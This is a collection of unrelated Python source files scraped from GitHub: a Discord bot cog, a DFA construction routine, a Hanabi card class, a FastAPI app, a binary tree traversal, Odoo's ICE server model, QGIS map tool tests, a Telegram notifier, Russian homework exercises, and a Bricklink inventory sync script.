+{"seq_id":"36642918372","text":"\"\"\"\nMisc\n\"\"\"\n\nfrom discord import Embed, User, Color\nfrom discord.ext.commands import Cog, command, Context\n\nfrom models.bot_model import CustomBot\n\nclass Other(Cog):\n \"\"\"\n Bot other commands cog\n \"\"\"\n\n def __init__(self, bot: CustomBot):\n self.bot = bot\n\n @command(description='Xem độ trễ của bot')\n async def ping(self, ctx: Context):\n \"\"\"\n Check bot ping\n \"\"\"\n await ctx.send(f'\\U0001f3d3 Pong! `{round(self.bot.latency * 1000)}ms`')\n\n @command(aliases=['av', 'avt'], description='Xem avatar của 1 user nào đó')\n async def avatar(self, ctx: Context, user: User = None):\n \"\"\"\n Get user avatar\n \"\"\"\n\n if user is None:\n user = ctx.author\n embed = Embed(\n title=f\"{user}'s avatar\",\n colour=Color.random()\n ).set_image(\n url=user.display_avatar.url\n )\n await ctx.send(embed=embed)\n\n # @avatar.error\n # async def avatar_e(self, ctx: Context, error):\n # if isinstance(error, UserNotFound):\n # return await ctx.reply('Không tìm thấy user này')\n # raise error\n\n\nasync def setup(bot: CustomBot):\n \"\"\"\n Run at setup\n \"\"\"\n\n await bot.add_cog(Other(bot))\n","repo_name":"tobycm/ayato","sub_path":"cogs/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"75071604070","text":"\"\"\"\nThis code returns a DFA that is equivalent to the Tree constructed by compressing all the traces into one tree.\n\"\"\"\n\nimport read_traces, DFA_utils_tree_only, time, tree_utils\n\n\ndef solve_tree_only(g_pos, G, Sigma, T, timeout, info, be_quiet=False):\n\tassert g_pos in G, f\"Error, g_pos not in G\"\n\n\t# creating the auxiliary tree structure\n\ttree = tree_utils.create_tree(g_pos, G, Sigma, T, prune=False)\n\tnodes = tree_utils.get_reachable_nodes(tree)\n\n\t# creating an equivalent DFA\n\tq_0 = 0\n\tq_pos = 1\n\tq_neg = 2\n\n\t# assigning ids to each node\n\tn_current = 3\n\tfor n in nodes:\n\t\tif n.is_root():\n\t\t\tn.assign_id(q_0)\n\t\telif n.is_positive_node():\n\t\t\tn.assign_id(q_pos)\n\t\telif n.is_negative_node():\n\t\t\tn.assign_id(q_neg)\n\t\telse:\n\t\t\tn.assign_id(n_current)\n\t\t\tn_current += 1\n\n\t# creating the dfa\n\tdfa = {}\n\tfor ni in nodes:\n\t\tif ni.is_terminal():\n\t\t\tcontinue\n\t\tni_id = ni.get_id()\n\t\tfor nj in ni.get_children():\n\t\t\tnj_id = nj.get_id()\n\t\t\tni_sigma = nj.get_psigma()\n\t\t\tdfa[(ni_id,ni_sigma)] = nj_id\n\tDFA_utils_tree_only.clean_dfa(q_0, dfa, T)\n\n\t# Adding the probabilities\n\tpos_prob = DFA_utils_tree_only.add_probabilities(q_0, dfa, T, g_pos)\n\n\treturn q_0, dfa, pos_prob\n","repo_name":"andrewli77/DISC","sub_path":"tree_only.py","file_name":"tree_only.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"72221640229","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport random\nimport math\nfrom collections import deque\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nfrom const import COL_TO_IND\nfrom const import IND_TO_COL\n\nclass card(object): \n\t\n\tdef __init__(self, value, color, k_val, k_col): \n\t\tself.value = value \n\t\tself.color = color \n\n\t\tself.know_val = k_val\n\t\tself.know_col = k_col\n\n\t\tself.name = IND_TO_COL[self.color] + \" \" + str(self.value)\n\t\tself.know_name = self.get_name()\n\n\t# sets either the color or value boolean to true\n\tdef know(self, which): \n\t\tif which == 'value': \n\t\t\tself.know_val = True\n\t\telif which == 'color': \n\t\t\tself.know_col = True\n\t\tself.know_name = self.get_name()\n\n\t# returns what we know about the card based on what's been hinted\n\tdef get_name(self): \n\t\tif self.know_val == True and self.know_col == False: \n\t\t\treturn str(self.value)\n\t\tif self.know_val == True and self.know_col == True: \n\t\t\treturn IND_TO_COL[self.color] + \" \" + str(self.value)\n\t\tif self.know_val == False and self.know_col == True: \n\t\t\treturn IND_TO_COL[self.color]\n\t\telse: \n\t\t\treturn \"\"\n\n\n#===============================================================================\n# Helper Functions\n#===============================================================================\n\n\n","repo_name":"audhuang/hanabi_ai","sub_path":"hanabi/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"6132217454","text":"from fastapi import FastAPI, APIRouter\r\n\r\nfrom services import get_channels, get_packages, post_package, home\r\n\r\napp = FastAPI(\r\n title='DTH CHANNELS',\r\n description='Displays channels list and provides provision to add or modify channels packages',\r\n openapi_url=f'/openapi.json',\r\n redoc_url=f'/redoc'\r\n)\r\n\r\nrouter = APIRouter()\r\n\r\napp.include_router(home.router)\r\napp.include_router(get_channels.router)\r\napp.include_router(post_package.router)\r\napp.include_router(get_packages.router)\r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n app.debug = True\r\n uvicorn.run(\r\n app=app,\r\n debug=app.debug\r\n )","repo_name":"vaidehi-nalmas/simple_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71214412709","text":"#!/usr/bin/env python3\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n nodes_values = []\n\n def traverseHelper(tree_node):\n if not tree_node:\n return\n traverseHelper(tree_node.left)\n nodes_values.append(tree_node.val)\n traverseHelper(tree_node.right)\n traverseHelper(root)\n return nodes_values;\n","repo_name":"codeme254/2023-code_surgery","sub_path":"0x16-binary_tree_inorder_traversal/optimized_solution1.py","file_name":"optimized_solution1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33903005235","text":"from odoo import fields, models\nfrom odoo.addons.mail.tools.discuss import get_twilio_credentials\nimport requests\n\n\nclass MailIceServer(models.Model):\n _name = 'mail.ice.server'\n _description = 'ICE server'\n\n server_type = fields.Selection([('stun', 'stun:'), ('turn', 'turn:')], string='Type', required=True, default='stun')\n uri = fields.Char('URI', required=True)\n username = fields.Char()\n credential = fields.Char()\n\n def _get_local_ice_servers(self):\n \"\"\"\n :return: List of up to 5 dict, each of which representing a stun or turn server\n \"\"\"\n # firefox has a hard cap of 5 ice servers\n ice_servers = self.sudo().search([], limit=5)\n formatted_ice_servers = []\n for ice_server in ice_servers:\n formatted_ice_server = {\n 'urls': '%s:%s' % (ice_server.server_type, ice_server.uri),\n }\n if ice_server.username:\n formatted_ice_server['username'] = ice_server.username\n if ice_server.credential:\n formatted_ice_server['credential'] = ice_server.credential\n formatted_ice_servers.append(formatted_ice_server)\n return formatted_ice_servers\n\n def _get_ice_servers(self):\n \"\"\"\n :return: List of dict, each of which representing a stun or turn server,\n formatted as expected by the specifications of RTCConfiguration.iceServers\n \"\"\"\n if self.env['ir.config_parameter'].sudo().get_param('mail.use_twilio_rtc_servers'):\n (account_sid, auth_token) = get_twilio_credentials(self.env)\n if account_sid and auth_token:\n url = f'https://api.twilio.com/2010-04-01/Accounts/{account_sid}/Tokens.json'\n response = requests.post(url, auth=(account_sid, auth_token), timeout=60)\n if response.ok:\n response_content = response.json()\n if response_content:\n return response_content['ice_servers']\n return self._get_local_ice_servers()\n","repo_name":"odoo/odoo","sub_path":"addons/mail/models/mail_ice_server.py","file_name":"mail_ice_server.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"15660027794","text":"from typing import TYPE_CHECKING, Callable, Optional\nfrom unittest.mock import MagicMock\n\nimport pytest\nfrom pytest_mock import MockerFixture\nfrom pytest_qgis import QgisInterface, QgsMapCanvas\nfrom qgis.core import (\n QgsAnnotationLayer,\n QgsFeature,\n QgsGeometry,\n QgsLineString,\n QgsPointLocator,\n QgsPointXY,\n QgsProject,\n QgsVectorLayer,\n)\nfrom qgis.gui import QgsMapMouseEvent, QgsMapToolIdentify\nfrom qgis.PyQt.QtCore import QEvent, QPoint, Qt\nfrom qgis.PyQt.QtGui import QKeyEvent\nfrom segment_reshape.geometry import reshape\nfrom segment_reshape.map_tool.segment_reshape_tool import SegmentReshapeTool, ToolMode\n\nif TYPE_CHECKING:\n from typing import Protocol\n\n class MouseEventFactoryType(Protocol):\n def __call__(\n self,\n location: QgsPointXY,\n mouse_event_type: QEvent.Type,\n mouse_button: Optional[Qt.MouseButton] = Qt.NoButton,\n ) -> QgsMapMouseEvent:\n ...\n\n\nMOUSE_LOCATION = QgsPointXY(1.5, 1.5)\n\n\n@pytest.fixture()\ndef mouse_event_factory(\n qgis_canvas: QgsMapCanvas,\n) -> \"MouseEventFactoryType\":\n def mouse_event_for_location(\n location: QgsPointXY,\n mouse_event_type: QEvent.Type,\n mouse_button: Optional[Qt.MouseButton] = None,\n ) -> QgsMapMouseEvent:\n mouse_button = mouse_button or Qt.NoButton\n event = QgsMapMouseEvent(\n qgis_canvas,\n mouse_event_type,\n QPoint(0, 0),\n mouse_button,\n )\n event.mapPoint = lambda: location # type: ignore[method-assign]\n event.mapPointMatch = lambda: QgsPointLocator.Match() # type: ignore[method-assign]\n return event\n\n return mouse_event_for_location\n\n\n@pytest.fixture()\ndef _add_layer(\n qgis_canvas: QgsMapCanvas,\n) -> None:\n layer = QgsAnnotationLayer(\n \"test\",\n QgsAnnotationLayer.LayerOptions(QgsProject.instance().transformContext()),\n )\n QgsProject.instance().addMapLayers([layer])\n qgis_canvas.setLayers([layer])\n qgis_canvas.setCurrentLayer(layer)\n\n\ndef _create_identify_result(\n identified_features: list[tuple[QgsFeature, QgsVectorLayer]]\n) -> list[QgsMapToolIdentify.IdentifyResult]:\n results = []\n\n for feature, layer in identified_features:\n # using the actual QgsMapToolIdentify.IdentifyResult causes\n # fatal exceptions, mock probably is sufficient for testing\n results.append(\n MagicMock(**{\"mLayer\": layer, \"mFeature\": feature}) # noqa: PIE804\n )\n\n return results\n\n\n@pytest.fixture()\ndef map_tool(qgis_canvas: QgsMapCanvas, qgis_new_project: None) -> SegmentReshapeTool:\n tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(tool)\n return tool\n\n\ndef test_change_to_pick_location_mode_resets_rubberbands(map_tool: SegmentReshapeTool):\n map_tool._change_to_reshape_mode_for_geom(\n QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n )\n\n map_tool._change_to_pick_location_mode()\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n\ndef test_pressing_esc_in_reshape_mode_aborts_reshape(map_tool: SegmentReshapeTool):\n map_tool._change_to_reshape_mode_for_geom(\n QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1, 2 2, 3 3, 4 4, 5 5)\"), None\n )\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n escape_press = QKeyEvent(QEvent.KeyPress, Qt.Key_Escape, Qt.NoModifier)\n map_tool.keyPressEvent(escape_press)\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n\ndef test_change_to_change_to_reshape_mode_toggles_pick_mode_off(\n map_tool: SegmentReshapeTool,\n):\n map_tool._tool_mode = ToolMode.PICK_SEGMENT\n\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n\ndef test_left_mouse_click_in_pick_mode_does_nothing_if_active_layer_or_feature_not_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n m_find_common_segment = mocker.patch.object(\n map_tool, \"_find_common_segment\", return_value=(None, None), autospec=True\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n\n\ndef test_left_mouse_click_in_pick_mode_does_nothing_if_common_segment_not_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n\n m_find_common_segment = mocker.patch.object(\n map_tool,\n \"_find_common_segment\",\n return_value=(None, QgsVectorLayer(\"test\")),\n autospec=True,\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n\n assert map_tool._tool_mode == ToolMode.PICK_SEGMENT\n\n\ndef test_left_mouse_click_in_pick_mode_starts_reshape_mode_if_common_segment_is_found(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool._change_to_pick_location_mode()\n assert map_tool.old_segment_rubber_band.asGeometry().isEmpty()\n assert map_tool.start_point_indicator_rubber_band.asGeometry().isEmpty()\n\n m_find_common_segment = mocker.patch.object(\n map_tool,\n \"_find_common_segment\",\n return_value=(QgsLineString([(0, 0), (1, 1)]), QgsVectorLayer(\"test\")),\n autospec=True,\n )\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n m_find_common_segment.assert_called_once()\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n\n assert map_tool.old_segment_rubber_band.asGeometry().isGeosEqual(\n QgsGeometry.fromWkt(\"LineString (0 0, 1 1)\")\n )\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (0 0, 0 0)\"\n )\n\n\n@pytest.mark.usefixtures(\"_add_layer\")\ndef test_left_mouse_click_in_reshape_mode_adds_points_to_maptool(\n mocker: MockerFixture,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n map_release = mouse_event_factory(\n MOUSE_LOCATION,\n QEvent.MouseButtonRelease,\n Qt.LeftButton,\n )\n map_tool.canvasReleaseEvent(map_release)\n\n assert map_tool.captureCurve().curveToLine().asWkt() == \"LineString (1.5 1.5)\"\n\n m_make_reshape_edits.assert_not_called()\n\n\n@pytest.mark.usefixtures(\"_add_layer\")\n@pytest.mark.parametrize(\n (\"points_to_remove\", \"expected_new\"),\n [\n (1, \"LineString (0 0, 1 1)\"),\n (2, \"LineString (0 0)\"),\n (3, \"LineString EMPTY\"),\n (6, \"LineString EMPTY\"),\n ],\n ids=[\n \"undo-few-last\",\n \"undo-so-that-one-left\",\n \"undo-first-point_temp-should-change-to-old_geom-start\",\n \"undo-when-no-points-left_temp-should-change-to-old_geom-start\",\n ],\n)\ndef test_undo_add_vertex_should_update_new(\n # map_tool: SegmentReshapeTool,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n points_to_remove: int,\n expected_new: str,\n):\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(1 0, 2 0, 3 0)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n # Add new line\n for new_point in [(0, 0), (1, 1), (2, 2)]:\n map_tool.addVertex(QgsPointXY(*new_point))\n\n assert map_tool.captureCurve().curveToLine().asWkt() == \"LineString (0 0, 1 1, 2 2)\"\n\n # Undo n times\n undo_key_event = QKeyEvent(QEvent.KeyPress, Qt.Key_Backspace, Qt.NoModifier)\n for _ in range(points_to_remove):\n map_tool.keyPressEvent(undo_key_event)\n\n assert map_tool._tool_mode == ToolMode.RESHAPE\n assert map_tool.captureCurve().curveToLine().asWkt() == expected_new\n assert map_tool.old_segment_rubber_band.asGeometry().asWkt() == old_geom.asWkt()\n\n\ndef test_start_point_indicator_rubberband(\n # map_tool: SegmentReshapeTool,\n qgis_canvas: QgsMapCanvas,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n map_tool = SegmentReshapeTool(qgis_canvas)\n qgis_canvas.setMapTool(map_tool)\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(1 0, 2 0, 3 0)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n # Move cursor to move temp rubberband end point\n mouse_move_event = mouse_event_factory(QgsPointXY(2, 3), QEvent.MouseMove)\n map_tool.canvasMoveEvent(mouse_move_event)\n\n assert map_tool.start_point_indicator_rubber_band.isVisible()\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (1 0, 2 3)\"\n )\n\n map_tool.addVertex(QgsPointXY(1, 1))\n\n assert not map_tool.start_point_indicator_rubber_band.isVisible()\n\n undo_key_event = QKeyEvent(QEvent.KeyPress, Qt.Key_Backspace, Qt.NoModifier)\n map_tool.keyPressEvent(undo_key_event)\n\n mouse_move_event = mouse_event_factory(QgsPointXY(4, 3), QEvent.MouseMove)\n map_tool.canvasMoveEvent(mouse_move_event)\n assert map_tool.start_point_indicator_rubber_band.isVisible()\n assert (\n map_tool.start_point_indicator_rubber_band.asGeometry().asWkt()\n == \"LineString (1 0, 4 3)\"\n )\n\n\ndef test_right_mouse_click_in_reshape_mode_changes_only_to_pick_mode_if_edited_geometry_is_empty(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n m_change_to_pick_location_mode = mocker.patch.object(\n map_tool, \"_change_to_pick_location_mode\", autospec=True\n )\n\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n right_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.RightButton\n )\n map_tool.cadCanvasReleaseEvent(right_click)\n\n m_change_to_pick_location_mode.assert_called_once()\n m_make_reshape_edits.assert_not_called()\n\n\ndef test_right_mouse_click_in_reshape_mode_calls_reshape_if_edited_geometry_is_not_empty(\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n mouse_event_factory: \"MouseEventFactoryType\",\n):\n old_geom = QgsGeometry.fromWkt(\"LINESTRING(0 0, 1 1)\")\n map_tool._change_to_reshape_mode_for_geom(old_geom)\n\n m_change_to_pick_location_mode = mocker.patch.object(\n map_tool, \"_change_to_pick_location_mode\", autospec=True\n )\n m_make_reshape_edits = mocker.patch.object(\n reshape, \"make_reshape_edits\", autospec=True\n )\n\n left_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.LeftButton\n )\n # Add point to rubberband\n map_tool.canvasReleaseEvent(left_click)\n\n # Test\n right_click = mouse_event_factory(\n QgsPointXY(1, 1), QEvent.MouseButtonRelease, Qt.RightButton\n )\n map_tool.cadCanvasReleaseEvent(right_click)\n\n m_change_to_pick_location_mode.assert_called_once()\n m_make_reshape_edits.assert_called_once()\n\n\n@pytest.mark.usefixtures(\"_use_topological_editing\")\ndef test_find_common_segment_should_return_shared_segment(\n qgis_iface: QgisInterface,\n map_tool: SegmentReshapeTool,\n mocker: MockerFixture,\n preset_features_layer_factory: Callable[\n [str, list[str]], tuple[QgsVectorLayer, list[QgsFeature]]\n ],\n):\n layer, (base_feature, *_) = preset_features_layer_factory(\n \"l1\",\n [\n \"LINESTRING(0 0, 1 1, 2 2, 3 3)\", # base\n \"LINESTRING(1 0, 1 1, 2 2, 2 0)\", # partly common\n \"LINESTRING(0 2, 2 2, 1 1, 0 1)\", # partly common reversed\n \"LINESTRING(0 0, 1 1)\", # edge start\n \"LINESTRING(2 2, 3 3)\", # edge end\n ],\n )\n\n QgsProject.instance().addMapLayer(layer)\n qgis_iface.setActiveLayer(layer)\n\n results = _create_identify_result(\n [\n (feature, layer)\n for feature in layer.getFeatures()\n if feature.id() != base_feature.id()\n ]\n )\n mocker.patch.object(QgsMapToolIdentify, \"identify\", return_value=results)\n\n segment, segment_layer = map_tool._find_common_segment(MOUSE_LOCATION)\n\n assert segment_layer == layer\n\n assert QgsGeometry(segment).isGeosEqual(QgsGeometry.fromWkt(\"LINESTRING(1 1, 2 2)\"))\n","repo_name":"nlsfi/segment-reshape-qgis-plugin","sub_path":"test/map_tool/test_segment_reshape_tool.py","file_name":"test_segment_reshape_tool.py","file_ext":"py","file_size_in_byte":13332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"10312988363","text":"import asyncio\nfrom telegram import Bot\nfrom config import TELEGRAM_TOKEN, CHAT_ID\n\n\ndef send_scopes(data_items):\n bot = Bot(token=TELEGRAM_TOKEN)\n # نمایش دادههای جدید و جداول متناظر با آنها\n for table_name, data in data_items:\n if data:\n message = f\"New Data for Table '{table_name}': {data}\"\n print(message)\n\n # ارسال پیام به تلگرام\n loop = asyncio.get_event_loop()\n loop.run_until_complete(bot.send_message(chat_id=CHAT_ID, text=message))\n","repo_name":"SShiravy/Sobi_hackerOne_bot","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40148924395","text":"# 1\n# Напишите программу которая сложит все числа в заданном списке\n# выведет результат в консоль\nnums1 = [5, 6, 92, 47, 12, -18, 33, 8];\n\n\n# 2\n# Напишите программу которая добавит в список edited_names словари\n# с двумя парами { \"name\": \"имя с большой буквы\", \"nameLength\": \"длина имени\"}\nnames = ['jack', 'sarah', 'mary', 'joey', 'chris', 'samantha'];\nedited_names = [];\n\n\n\n# 3\n# Напишите программу которая в список edited_nums добавит словари\n# с тремя парами { \"number\": \"само число\", \"square\": \"число в квадрпате\", \"cube\": \"число в кубе\"}\nnums2 = [1, 2, 3, 4, 5, 6, 7, 8, 9];\nedited_nums = [];\n\n\n# 4\n# напишите программу которая выводит в консоль сумму всех\n# четных чисел в списке\n\nnums_list = [1, 12, 34, 71, 14, 12, 33, 70, 82, 81, 9, 19, 90];\n\n\n# 5\n# напишите программу которая проанализирует данный список и выведет в консоль самую длинную строку\n\nsome_strings = ['Star', 'Planet', 'Comet', 'Interstellar', 'Space'];\n\n# 6\n# напишите программу которая возьмёт из данного списка наименования книг которые вышли в этом году\n# и добавит их в новый список\n\nbooks = [\n {\n 'author': 'Jeremy Brook',\n 'title': 'My childhood',\n 'release': 2023\n },\n {\n 'author': 'Samantha Jhones',\n 'title': 'Living with ten cats',\n 'release': 2020\n },\n {\n 'author': 'Bob Summers',\n 'title': 'Exploring far space',\n 'release': 2021\n },\n {\n 'author': 'Bill Brown',\n 'title': 'Insects in our garden',\n 'release': 2023\n },\n {\n 'author': 'Jessica Love',\n 'title': 'Programming for begginers',\n 'release': 2023\n }\n];\n\n\n# 7\n# Напишите функцию которая будет принимать два аргумента (start, end)\n# Для каждого числа в диапозоне от start до end будет выводить число\n# И Четное оно Или нечетное\n","repo_name":"GammaIntelligenceTraining/Python13","sub_path":"102_homeworks/001_list_dictionary/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14608630536","text":"\"\"\"\nCommand that should run:\n - When the SYNC activity starts in order to make sure the local items are present in the remote Bricklink's store before\n issuing the delta updates when the orders are received.\n - Periodically (e.g. every hour), to push possible price changes and, in general, ensure correct synchronization.\n\nGet the differences between the local and the remote Bricklink store and upload the differences to the Bricklink store to ensure\nit has *at least* the local inventory items.\n\"\"\"\n\n\nimport asyncio\nfrom backends.bricklink import Bricklink, parse_bricklink_item_type, to_bricklink_item_type\nfrom backends.bricklink_types import StoreInventory\nfrom db import Session\nfrom models import InventoryItem\nfrom math import ceil\nfrom typing import List, Optional\nimport time\nfrom datetime import datetime\n\n\nMAX_ELAPSED_TIME = 40 * 60 # 40 minutes\nBATCH_SIZE = 100\n\n\nbricklink = Bricklink.from_supervisor()\n\n\ndef match_remote_inventory_item(inventory_item: InventoryItem, remote_inventory_item: StoreInventory) -> bool:\n does_match = True\n does_match &= inventory_item.item_id == remote_inventory_item['item']['no']\n does_match &= inventory_item.item_type == parse_bricklink_item_type(remote_inventory_item['item']['type'])\n does_match &= inventory_item.color_id == remote_inventory_item['color_id']\n does_match &= inventory_item.condition == remote_inventory_item['new_or_used']\n does_match &= inventory_item.user_remarks == remote_inventory_item['remarks']\n return does_match\n\n\nasync def search_item_in_remote_inventory_batch(inventory_item: InventoryItem, remote_inventory_batch: List[StoreInventory]) -> Optional[StoreInventory]:\n for remote_inventory_item in remote_inventory_batch:\n if match_remote_inventory_item(inventory_item, remote_inventory_item):\n return remote_inventory_item\n return None\n\n\ndef is_different(inventory_item: InventoryItem, remote_inventory_item: StoreInventory):\n result = False\n result |= inventory_item.unit_price != remote_inventory_item['unit_price']\n result |= inventory_item.quantity != remote_inventory_item['quantity']\n result |= inventory_item.user_description != remote_inventory_item['description']\n return result\n\n\ndef create_inventory_item(inventory_item: InventoryItem):\n # https://www.bricklink.com/v3/api.page?page=create-inventory\n bricklink.create_store_inventories(store_inventory_resources=[{\n 'item': {\n 'no': inventory_item.item_id,\n 'type': to_bricklink_item_type(inventory_item.item_type),\n },\n 'color_id': inventory_item.color_id,\n 'quantity': inventory_item.quantity,\n 'unit_price': 1.0,#inventory_item.unit_price,\n 'new_or_used': inventory_item.condition,\n 'completeness': None,\n 'description': inventory_item.user_description,\n 'remarks': inventory_item.user_remarks,\n 'bulk': None,\n 'is_retain': False,\n 'is_stock_room': False,\n 'my_cost': None,\n 'sale_rate': None,\n 'tier_quantity1': None,\n 'tier_quantity2': None,\n 'tier_quantity3': None,\n 'tier_price1': None,\n 'tier_price2': None,\n 'tier_price3': None,\n }])\n\n\ndef update_inventory_item(inventory_item: InventoryItem, remote_item_id: int):\n # https://www.bricklink.com/v3/api.page?page=update-inventory\n bricklink.update_store_inventory(remote_item_id, store_inventory_resource={\n 'quantity': inventory_item.quantity,\n 'description': inventory_item.user_description,\n 'remarks': inventory_item.user_remarks,\n 'bulk': None,\n 'is_retain': False,\n 'is_stock_room': False,\n 'stock_room_id': None,\n 'my_cost': None,\n 'sale_rate': None,\n 'tier_quantity1': None,\n 'tier_quantity2': None,\n 'tier_quantity3': None,\n 'tier_price1': None,\n 'tier_price2': None,\n 'tier_price3': None,\n })\n\n\nasync def run():\n started_at = time.time()\n\n remote_inventory = bricklink.get_store_inventories()\n\n session = Session()\n inventory_items: List[InventoryItem] = \\\n session.query(InventoryItem) \\\n .order_by(InventoryItem.bl_synced_at.asc()) \\\n .all()\n\n for item in inventory_items:\n if (time.time() - started_at) >= MAX_ELAPSED_TIME:\n print(f\"Max elapsed time reached\")\n return\n\n print(f\"Item {item.item_id} ({item.item_type}) {item.color.name}\", end='')\n\n if not item.is_valid_for_bricklink():\n print(f\" -> NOT SYNCABLE\")\n continue\n\n matching_remote_items: List[Optional[StoreInventory]] = \\\n await asyncio.gather(*[\n search_item_in_remote_inventory_batch(item, remote_inventory[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])\n for i in range(0, ceil(len(remote_inventory) / BATCH_SIZE))\n ])\n \n matching_remote_items = [ item for item in matching_remote_items if item ]\n\n if len(matching_remote_items) == 0:\n # There's no remote item that matches local inventory item, therefore we need to CREATE IT\n\n print(f\" -> CREATE\")\n\n create_inventory_item(item)\n else:\n # If more than a remote item matches (e.g. different description), keep the item whose inventory_id is less\n matching_remote_items.sort(key=lambda x: x['inventory_id'])\n matching_remote_item: StoreInventory = matching_remote_items[0]\n\n if is_different(item, matching_remote_item):\n # If the local item is considered to be different from remote, issue an UPDATE\n\n print(f\" -> UPDATE (\"\n f\"quantity: {item.quantity}/{matching_remote_item['quantity']}, \"\n f\"unit_price: {item.unit_price}/{matching_remote_item['unit_price']}, \"\n f\"user_description: \\\"{item.user_description}\\\"/\\\"{matching_remote_item['description']}\\\"\"\n \")\")\n\n update_inventory_item(item, matching_remote_item['inventory_id'])\n else:\n print('') # Nothing to do!\n \n item.bl_synced_at = datetime.now()\n","repo_name":"loryruta/brick-scraper","sub_path":"src/commands/sync_bricklink_store.py","file_name":"sync_bricklink_store.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
